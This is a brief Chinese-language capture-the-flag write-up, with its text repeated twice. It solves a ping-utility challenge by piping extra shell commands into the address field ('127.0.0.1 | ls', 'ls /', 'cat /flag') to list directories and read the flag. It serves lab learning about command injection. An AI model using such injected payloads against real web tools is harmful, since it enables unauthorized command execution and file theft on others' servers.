题目网站是一个可以ping各种地址的小程序,返回的应该是命令执行结果
于是想到注入其他命令
127.0.0.1 | ls
接着查看根目录
127.0.0.1 | ls /
看见flag,最后打开它即可
127.0.0.1 | cat /flag
题目网站是一个可以ping各种地址的小程序,返回的应该是命令执行结果
于是想到注入其他命令
127.0.0.1 | ls
接着查看根目录
127.0.0.1 | ls /
看见flag,最后打开它即可
127.0.0.1 | cat /flag